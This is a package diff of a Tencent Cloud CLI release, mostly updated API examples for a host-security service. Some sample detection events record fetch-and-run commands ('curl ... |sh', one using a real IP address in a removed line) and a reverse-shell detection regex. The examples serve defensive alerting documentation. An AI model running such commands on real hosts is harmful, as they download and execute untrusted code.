tccli 3.0.1215.1__py2.py3-none-any.whl → 3.0.1216.1__py2.py3-none-any.whl

Files changed (99) hide show
  1. tccli/__init__.py +1 -1
  2. tccli/configure.py +46 -1
  3. tccli/services/__init__.py +0 -3
  4. tccli/services/apm/v20210622/api.json +20 -0
  5. tccli/services/asr/v20190614/api.json +3 -3
  6. tccli/services/bi/v20220105/api.json +32 -4
  7. tccli/services/bi/v20220105/examples.json +1 -1
  8. tccli/services/billing/billing_client.py +53 -0
  9. tccli/services/billing/v20180709/api.json +304 -0
  10. tccli/services/billing/v20180709/examples.json +8 -0
  11. tccli/services/bsca/v20210811/api.json +222 -17
  12. tccli/services/bsca/v20210811/examples.json +4 -4
  13. tccli/services/ccc/ccc_client.py +53 -0
  14. tccli/services/ccc/v20200210/api.json +167 -18
  15. tccli/services/ccc/v20200210/examples.json +11 -3
  16. tccli/services/cdb/v20170320/api.json +13 -4
  17. tccli/services/cdb/v20170320/examples.json +1 -1
  18. tccli/services/cdn/v20180606/api.json +5 -3
  19. tccli/services/cdwdoris/v20211228/api.json +12 -2
  20. tccli/services/cfw/v20190904/api.json +81 -47
  21. tccli/services/cfw/v20190904/examples.json +46 -40
  22. tccli/services/ciam/v20220331/api.json +316 -315
  23. tccli/services/ciam/v20220331/examples.json +49 -49
  24. tccli/services/cloudaudit/cloudaudit_client.py +30 -30
  25. tccli/services/cloudaudit/v20190319/api.json +215 -186
  26. tccli/services/cloudaudit/v20190319/examples.json +13 -13
  27. tccli/services/cls/v20201016/api.json +365 -66
  28. tccli/services/cls/v20201016/examples.json +9 -3
  29. tccli/services/csip/v20221121/api.json +4 -4
  30. tccli/services/cvm/v20170312/api.json +42 -0
  31. tccli/services/cwp/v20180228/api.json +217 -163
  32. tccli/services/cwp/v20180228/examples.json +53 -65
  33. tccli/services/cynosdb/v20190107/api.json +77 -29
  34. tccli/services/cynosdb/v20190107/examples.json +22 -22
  35. tccli/services/dasb/v20191018/api.json +77 -0
  36. tccli/services/dasb/v20191018/examples.json +5 -5
  37. tccli/services/domain/v20180808/api.json +3 -3
  38. tccli/services/domain/v20180808/examples.json +3 -3
  39. tccli/services/eb/v20210416/api.json +15 -15
  40. tccli/services/eb/v20210416/examples.json +1 -1
  41. tccli/services/es/es_client.py +249 -37
  42. tccli/services/es/v20180416/api.json +521 -0
  43. tccli/services/es/v20180416/examples.json +32 -0
  44. tccli/services/ess/ess_client.py +53 -0
  45. tccli/services/ess/v20201111/api.json +145 -9
  46. tccli/services/ess/v20201111/examples.json +15 -1
  47. tccli/services/essbasic/essbasic_client.py +106 -0
  48. tccli/services/essbasic/v20210526/api.json +234 -12
  49. tccli/services/essbasic/v20210526/examples.json +22 -0
  50. tccli/services/gaap/v20180529/api.json +44 -26
  51. tccli/services/gaap/v20180529/examples.json +24 -30
  52. tccli/services/iotexplorer/v20190423/api.json +40 -0
  53. tccli/services/live/v20180801/api.json +35 -9
  54. tccli/services/mongodb/v20190725/api.json +6 -8
  55. tccli/services/ocr/v20181119/api.json +2 -2
  56. tccli/services/organization/organization_client.py +352 -34
  57. tccli/services/organization/v20210331/api.json +451 -0
  58. tccli/services/organization/v20210331/examples.json +48 -0
  59. tccli/services/region/v20220627/api.json +1 -1
  60. tccli/services/scf/scf_client.py +269 -4
  61. tccli/services/scf/v20180416/api.json +554 -0
  62. tccli/services/scf/v20180416/examples.json +46 -0
  63. tccli/services/ssl/v20191205/api.json +1 -1
  64. tccli/services/tat/v20201028/api.json +27 -25
  65. tccli/services/tat/v20201028/examples.json +4 -4
  66. tccli/services/tcss/v20201101/api.json +13 -13
  67. tccli/services/tcss/v20201101/examples.json +5 -5
  68. tccli/services/tdmq/v20200217/api.json +64 -63
  69. tccli/services/tdmq/v20200217/examples.json +2 -2
  70. tccli/services/tem/v20210701/api.json +144 -103
  71. tccli/services/tem/v20210701/examples.json +27 -27
  72. tccli/services/teo/teo_client.py +277 -12
  73. tccli/services/teo/v20220901/api.json +1020 -143
  74. tccli/services/teo/v20220901/examples.json +71 -1
  75. tccli/services/tke/tke_client.py +53 -0
  76. tccli/services/tke/v20180525/api.json +43 -0
  77. tccli/services/tke/v20180525/examples.json +8 -0
  78. tccli/services/tms/tms_client.py +4 -57
  79. tccli/services/tms/v20201229/api.json +0 -354
  80. tccli/services/tms/v20201229/examples.json +0 -8
  81. tccli/services/trtc/v20190722/api.json +221 -22
  82. tccli/services/vpc/v20170312/api.json +105 -30
  83. tccli/services/vpc/v20170312/examples.json +10 -2
  84. tccli/services/vpc/vpc_client.py +107 -54
  85. tccli/services/waf/v20180125/api.json +61 -0
  86. tccli/services/waf/v20180125/examples.json +8 -0
  87. tccli/services/waf/waf_client.py +53 -0
  88. tccli/services/wedata/v20210820/api.json +686 -0
  89. tccli/services/wedata/v20210820/examples.json +16 -0
  90. tccli/services/wedata/wedata_client.py +106 -0
  91. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/METADATA +6 -2
  92. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/RECORD +95 -99
  93. tccli/services/cr/__init__.py +0 -4
  94. tccli/services/cr/cr_client.py +0 -1626
  95. tccli/services/cr/v20180321/api.json +0 -2829
  96. tccli/services/cr/v20180321/examples.json +0 -235
  97. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/WHEEL +0 -0
  98. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/entry_points.txt +0 -0
  99. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/license_files/LICENSE +0 -0
@@ -3,8 +3,8 @@
3
3
  "AddLoginWhiteLists": [
4
4
  {
5
5
  "document": "入侵检测-登录审计-批量添加异地登录白名单",
6
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: AddLoginWhiteLists\n<公共请求参数>\n\n{\n \"EventId\": 11234,\n \"ProcessType\": \"Id\",\n \"HostLoginWhiteObj\": {\n \"UserName\": \"xx\",\n \"Remark\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 0,\n \"CountryId\": 0,\n \"ProvinceId\": 135\n }\n ],\n \"IsGlobal\": 0,\n \"HostInfos\": [\n {\n \"Quuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\",\n \"Uuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\"\n }\n ],\n \"StartTime\": \"00:00\",\n \"SrcIp\": \"1.2.3.4\",\n \"EndTime\": \"00:01\"\n }\n}",
7
- "output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"Error\": {\n \"Code\": \"InvalidParameter.RuleHostipErr\",\n \"Message\": \"无对应主机信息\"\n }\n }\n}",
6
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: AddLoginWhiteLists\n<公共请求参数>\n\n{\n \"EventId\": 11234,\n \"ProcessType\": \"Id\",\n \"HostLoginWhiteObj\": {\n \"UserName\": \"root\",\n \"Remark\": \"备注\",\n \"Places\": [\n {\n \"CityId\": 0,\n \"CountryId\": 0,\n \"ProvinceId\": 135\n }\n ],\n \"IsGlobal\": 0,\n \"HostInfos\": [\n {\n \"Quuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\",\n \"Uuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\"\n }\n ],\n \"StartTime\": \"00:00\",\n \"SrcIp\": \"1.2.3.4\",\n \"EndTime\": \"00:01\"\n }\n}",
7
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"Error\": {\n \"Code\": \"InvalidParameter.RuleHostipErr\",\n \"Message\": \"无对应主机信息\"\n }\n }\n}",
8
8
  "title": "批量添加异地登录白名单"
9
9
  }
10
10
  ],
@@ -89,8 +89,8 @@
89
89
  "CreateBanWhiteList": [
90
90
  {
91
91
  "document": "",
92
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateBanWhiteList\n<公共请求参数>\n\n{\n \"Rules\": {\n \"Remark\": \"xx\",\n \"Uuid\": \"xx\",\n \"IsGlobal\": true,\n \"Id\": \"xx\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"xx\",\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"Quuids\": [\n \"xx\"\n ]\n }\n}",
93
- "output": "{\n \"Response\": {\n \"IsDuplicate\": true,\n \"IsGlobal\": false,\n \"DuplicateHosts\": [\n {\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\",\n \"Id\": 1\n },\n {\n \"Id\": 1,\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\"\n },\n {\n \"Id\": 1,\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\"\n },\n {\n \"Id\": 1,\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
92
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateBanWhiteList\n<公共请求参数>\n\n{\n \"Rules\": {\n \"Remark\": \"备注\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"IsGlobal\": true,\n \"Id\": \"1\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"1.1.1.1\",\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"Quuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n }\n}",
93
+ "output": "{\n \"Response\": {\n \"IsDuplicate\": true,\n \"IsGlobal\": false,\n \"DuplicateHosts\": [\n {\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
94
94
  "title": "添加阻断白名单列表"
95
95
  }
96
96
  ],
@@ -162,7 +162,7 @@
162
162
  {
163
163
  "document": "",
164
164
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateMalwareWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"abc\"\n ],\n \"IsGlobal\": 1,\n \"Mode\": 1,\n \"MatchType\": 1,\n \"FileName\": [\n \"abc\"\n ],\n \"FileDirectory\": [\n \"abc\"\n ],\n \"FileExtension\": [\n \"abc\"\n ],\n \"Md5List\": [\n \"e10adc3949ba59abbe56e057f20f883e\"\n ],\n \"EventId\": 1\n}",
165
- "output": "{\n \"Response\": {\n \"RequestId\": \"abc\"\n }\n}",
165
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
166
166
  "title": "创建木马白名单"
167
167
  }
168
168
  ],
@@ -217,7 +217,7 @@
217
217
  "CreateVulFix": [
218
218
  {
219
219
  "document": "提交漏洞修护",
220
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateVulFix\n<公共请求参数>\n\n{\n \"CreateVulFixTaskQuuids\": [\n {\n \"Quuids\": [\n \"xx\"\n ],\n \"VulId\": 1\n }\n ],\n \"SnapshotName\": \"xx\",\n \"SaveDays\": 1\n}",
220
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateVulFix\n<公共请求参数>\n\n{\n \"CreateVulFixTaskQuuids\": [\n {\n \"Quuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"VulId\": 1\n }\n ],\n \"SnapshotName\": \"快照名称\",\n \"SaveDays\": 1\n}",
221
221
  "output": "{\n \"Response\": {\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\",\n \"FixId\": 1\n }\n}",
222
222
  "title": "提交漏洞修护"
223
223
  }
@@ -1050,7 +1050,7 @@
1050
1050
  {
1051
1051
  "document": "",
1052
1052
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribeBanRegions\n&Mode=STANDARD_MODE\n&<公共请求参数>",
1053
- "output": "{\n \"Response\": {\n \"RegionSet\": [\n {\n \"ZoneSet\": [\n {\n \"ZoneName\": \"xx\"\n }\n ],\n \"RegionName\": \"xx\"\n },\n {\n \"ZoneSet\": [\n {\n \"ZoneName\": \"xx\"\n }\n ],\n \"RegionName\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1053
+ "output": "{\n \"Response\": {\n \"RegionSet\": [\n {\n \"RegionName\": \"华南地区(广州)\",\n \"ZoneSet\": [\n {\n \"ZoneName\": \"广州二区\"\n },\n {\n \"ZoneName\": \"广州三区\"\n },\n {\n \"ZoneName\": \"广州四区\"\n },\n {\n \"ZoneName\": \"广州六区\"\n },\n {\n \"ZoneName\": \"广州七区\"\n }\n ]\n }\n ],\n \"RequestId\": \"dd2d8482-b462-4260-a9df-2f9e92abd72b\"\n }\n}",
1054
1054
  "title": "获取阻断地域"
1055
1055
  }
1056
1056
  ],
@@ -1317,16 +1317,10 @@
1317
1317
  }
1318
1318
  ],
1319
1319
  "DescribeBashEvents": [
1320
- {
1321
- "document": "获取高危命令列表",
1322
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEvents\n<公共请求参数>\n\n{}",
1323
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"RuleLevel\": 1,\n \"Exe\": \"xx\",\n \"Uuid\": \"xx\",\n \"RuleId\": 1,\n \"RegexBashCmd\": \"xx\",\n \"DetectBy\": 1,\n \"RuleName\": \"xx\",\n \"Pid\": \"xx\",\n \"MachineName\": \"xx\",\n \"Id\": 1,\n \"Platform\": 1,\n \"User\": \"xx\",\n \"Hostip\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"CreateTime\": \"xx\",\n \"BashCmd\": \"xx\",\n \"RuleCategory\": 1,\n \"Quuid\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1324
- "title": "获取高危命令列表"
1325
- },
1326
1320
  {
1327
1321
  "document": "",
1328
1322
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEvents\n<公共请求参数>\n\n{\n \"Limit\": \"1\",\n \"Offset\": \"0\"\n}",
1329
- "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Id\": 3148114,\n \"Quuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Hostip\": \"192.168.111.28\",\n \"User\": \"root\",\n \"Platform\": 4,\n \"BashCmd\": \"./r3hook_tool moc -var www.test123.com\",\n \"RuleId\": 0,\n \"RuleName\": \"sysrule_custom_procmon_1\",\n \"RuleLevel\": 1,\n \"Status\": 0,\n \"CreateTime\": \"2022-09-01 17:28:39\",\n \"MachineName\": \"v_llzlu恶意请求\",\n \"DetectBy\": 0,\n \"Pid\": \"0\",\n \"Exe\": \"\",\n \"ModifyTime\": \"0001-01-01 00:00:00\",\n \"RegexBashCmd\": \"\\\\./r3hook_tool moc -var www\\\\.test123\\\\.com\",\n \"RuleCategory\": 0\n }\n ],\n \"RequestId\": \"c787b780-0a35-4fa5-aca3-db339b9a20e8\",\n \"TotalCount\": 51315\n }\n}",
1323
+ "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Hostip\": \"1.1.1.1\",\n \"User\": \"root:root\",\n \"Platform\": 4,\n \"BashCmd\": \"/bin/sh -c curl www.xx.com |sh\",\n \"RuleId\": 150,\n \"RuleName\": \"系统规则(标准)-计划任务远程下载\",\n \"RuleLevel\": 2,\n \"Status\": 0,\n \"CreateTime\": \"2024-10-17 12:16:08\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"Pid\": \"27605\",\n \"Exe\": \"/usr/bin/bash\",\n \"ModifyTime\": \"2024-10-17 20:09:01\",\n \"RegexBashCmd\": \"/bin/sh -c curl www.xx.com |sh\",\n \"RuleCategory\": 0,\n \"HostName\": \"机器名称\"\n }\n ],\n \"RequestId\": \"7ae8b771-d517-4f78-95e0-a5432a5f1b49\",\n \"TotalCount\": 1\n }\n}",
1330
1324
  "title": "高危命令事件列表"
1331
1325
  }
1332
1326
  ],
@@ -1334,7 +1328,7 @@
1334
1328
  {
1335
1329
  "document": "",
1336
1330
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
1337
- "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"xx\",\n \"RegexBashCmd\": \"xx\",\n \"Platform\": 1,\n \"Id\": 1,\n \"Status\": 1,\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"RuleLevel\": 1,\n \"SuggestScheme\": \"xx\",\n \"Exe\": \"xx\",\n \"HostIp\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"BashCmd\": \"xx\",\n \"RuleCategory\": 1,\n \"RuleId\": 1,\n \"HarmDescribe\": \"xx\",\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"RuleName\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"CreateTime\": \"xx\",\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
1331
+ "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"BashCmd\": \"base64 -d\",\n \"CreateTime\": \"2024-10-24 16:20:57\",\n \"DetectBy\": \"1\",\n \"Exe\": \"/usr/bin/base64\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"HostIp\": \"1.1.1.1\",\n \"Id\": 10001,\n \"MachineName\": \"机器名称\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"ModifyTime\": \"2024-10-24 16:20:58\",\n \"Pid\": \"5747\",\n \"Platform\": 4,\n \"PsTree\": \"[{\\\"pid\\\":5747,\\\"exe\\\":\\\"/usr/bin/base64\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"base64 -d\\\",\\\"ssh_service\\\":\\\"1.1.1.1\\\",\\\"ssh_source\\\":\\\"1.1.1.1:2578\\\",\\\"start_time\\\":1729758057,\\\"type\\\":1},{\\\"pid\\\":4461,\\\"exe\\\":\\\"/usr/bin/bash\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"-bash\\\",\\\"ssh_service\\\":\\\"1.1.1.1:22\\\",\\\"ssh_source\\\":\\\"1.1.1.1:2578\\\",\\\"start_time\\\":1729757844,\\\"type\\\":2}]\",\n \"Quuid\": \"fcf85fc9-f45e-457a-bca4-fcae074eda32\",\n \"References\": [],\n \"RegexBashCmd\": \"base64 -d\",\n \"RuleCategory\": 1,\n \"RuleId\": 0,\n \"RuleLevel\": 1,\n \"RuleName\": \"sh拦截\",\n \"Status\": 5,\n \"SuggestScheme\": \"1、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2、隔离或者删除相关的木马文件;\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"Tags\": [],\n \"User\": \"0:0\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n },\n \"RequestId\": \"41030e32-67ec-4f07-858c-432ea384ad5a\"\n }\n}",
1338
1332
  "title": "示例"
1339
1333
  }
1340
1334
  ],
@@ -1342,14 +1336,8 @@
1342
1336
  {
1343
1337
  "document": "",
1344
1338
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfoNew\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
1345
- "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"xx\",\n \"RegexBashCmd\": \"xx\",\n \"Platform\": 1,\n \"Id\": 1,\n \"Status\": 1,\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"RuleLevel\": 1,\n \"SuggestScheme\": \"xx\",\n \"Exe\": \"xx\",\n \"HostIp\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"BashCmd\": \"xx\",\n \"RuleCategory\": 1,\n \"RuleId\": 1,\n \"HarmDescribe\": \"xx\",\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"RuleName\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"CreateTime\": \"xx\",\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
1346
- "title": "示例"
1347
- },
1348
- {
1349
- "document": "",
1350
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfoNew\n<公共请求参数>\n\n{\n \"Id\": \"3170751\"\n}",
1351
- "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\n \"Id\": 3170751,\n \"Quuid\": \"d8feb20e-dcdd-461b-9b37-336c42d48657\",\n \"HostIp\": \"172.16.0.49\",\n \"Platform\": 4,\n \"BashCmd\": \"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\n \"RuleId\": 0,\n \"RuleName\": \"1003.恶意命令-下载&执行未知程序\",\n \"RuleLevel\": 1,\n \"Status\": 0,\n \"CreateTime\": \"2022-09-19 19:45:05\",\n \"Exe\": \"/usr/bin/bash\",\n \"ModifyTime\": \"2022-09-19 19:45:05\",\n \"PsTree\": \"W3sicGlkIjoyOTQ0NiwiZXhlIjoiL3Vzci9iaW4vYmFzaCIsImFjY291bnQiOiJyb290OnJvb3QiLCJjbWRsaW5lIjoiL2Jpbi9zaCAtYyBjdXJsIDQzLjEyOS42NS4xMDEvMS5zaHxzaCJ9LHsicGlkIjoyOTQ0NCwiZXhlIjoiL3Vzci9zYmluL2Nyb25kIiwiYWNjb3VudCI6InJvb3Q6cm9vdCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vQ1JPTkQgLW4ifSx7InBpZCI6MTM5OSwiZXhlIjoiL3Vzci9zYmluL2Nyb25kIiwiYWNjb3VudCI6InJvb3Q6cm9vdCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vY3JvbmQgLW4ifV0=\",\n \"User\": \"0:0\",\n \"Pid\": \"29446\",\n \"RegexBashCmd\": \"/bin/sh -c curl 43\\\\.129\\\\.65\\\\.101/1\\\\.sh\\\\|sh\",\n \"RuleCategory\": 0,\n \"MachineName\": \"功能测试软件较多_ivon\",\n \"SuggestScheme\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineWanIp\": \"42.194.146.17\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": 2,\n \"DetectBy\": 1\n },\n \"RequestId\": \"0a9b5442-cd56-4b47-86c7-0f9f22d9fc7e\"\n }\n}",
1352
- "title": "示例1"
1339
+ "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Platform\": 4,\n \"BashCmd\": \"base64 -d\",\n \"RuleId\": 31390,\n \"RuleName\": \"sh拦截\",\n \"RuleLevel\": 1,\n \"Status\": 5,\n \"CreateTime\": \"2024-10-24 16:20:58\",\n \"Exe\": \"/usr/bin/base64\",\n \"ModifyTime\": \"2024-10-24 16:20:58\",\n \"PsTree\": \"\",\n \"User\": \"0:0\",\n \"Pid\": \"5747\",\n \"RegexBashCmd\": \"base64 -d\",\n \"RuleCategory\": 1,\n \"MachineName\": \"机器名称\",\n \"SuggestScheme\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": 2,\n \"DetectBy\": 1\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1340
+ "title": "查询高危命令详情信息"
1353
1341
  }
1354
1342
  ],
1355
1343
  "DescribeBashEventsNew": [
@@ -1370,17 +1358,17 @@
1370
1358
  ],
1371
1359
  "DescribeBashRules": [
1372
1360
  {
1373
- "document": "",
1374
- "input": "https://cwp.tencentcloudapi.com/?Action=DescribeBashRules\n&Type=1\n&<公共请求参数>",
1375
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"Name\": \"xx\",\n \"Level\": 1,\n \"Hostip\": \"xx\",\n \"IsGlobal\": 1,\n \"Rule\": \"xx\",\n \"CreateTime\": \"xx\",\n \"Decription\": \"xx\",\n \"Uuids\": [\n \"xx\"\n ],\n \"ModifyTime\": \"xx\",\n \"Operator\": \"xx\",\n \"White\": 1,\n \"DealOldEvents\": 1,\n \"Id\": 1,\n \"Uuid\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1376
- "title": "获取高危命令规则列表"
1361
+ "document": "获取高危命令规则列表",
1362
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashRules\n<公共请求参数>\n\n{\n \"Type\": 1\n}",
1363
+ "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 1,\n \"Uuid\": \"\",\n \"Name\": \"反弹shell\",\n \"Level\": 3,\n \"Rule\": \"ncat\\\\s+--ssl.*?\\\\/bin\\\\/bash\",\n \"Decription\": \"\",\n \"Operator\": \"root\",\n \"IsGlobal\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2021-04-10 16:46:55\",\n \"ModifyTime\": \"2021-04-10 16:46:55\",\n \"Hostip\": \"\",\n \"White\": 0,\n \"Uuids\": [],\n \"DealOldEvents\": 0,\n \"Description\": \"\"\n }\n ],\n \"RequestId\": \"a0e9ed25-686e-452b-8dd1-ef25440c6543\",\n \"TotalCount\": 1\n }\n}",
1364
+ "title": "示例"
1377
1365
  }
1378
1366
  ],
1379
1367
  "DescribeBruteAttackList": [
1380
1368
  {
1381
1369
  "document": "获取密码破解列表",
1382
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBruteAttackList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Filters\": [\n {\n \"Values\": [\n \"abc\"\n ],\n \"Name\": \"abc\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
1383
- "output": "{\n \"Response\": {\n \"BruteAttackList\": [\n {\n \"Id\": 202008000000971,\n \"Uuid\": \"c2972dd6-165e-11ea-95eb-40f2e9f5667a\",\n \"MachineIp\": \"10.104.135.28\",\n \"MachineName\": \"poc测试-debian9\",\n \"UserName\": \"root\",\n \"SrcIp\": \"117.146.173.98\",\n \"Status\": \"FAILED\",\n \"EventType\": 200,\n \"Country\": 1,\n \"City\": 334,\n \"Province\": 31,\n \"CreateTime\": \"2020-02-21 16:35:49\",\n \"BanStatus\": 82,\n \"Count\": 1098,\n \"InstanceId\": \"ins-xxx\"\n }\n ],\n \"RequestId\": \"4234234\",\n \"TotalCount\": 25328\n }\n}",
1370
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBruteAttackList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
1371
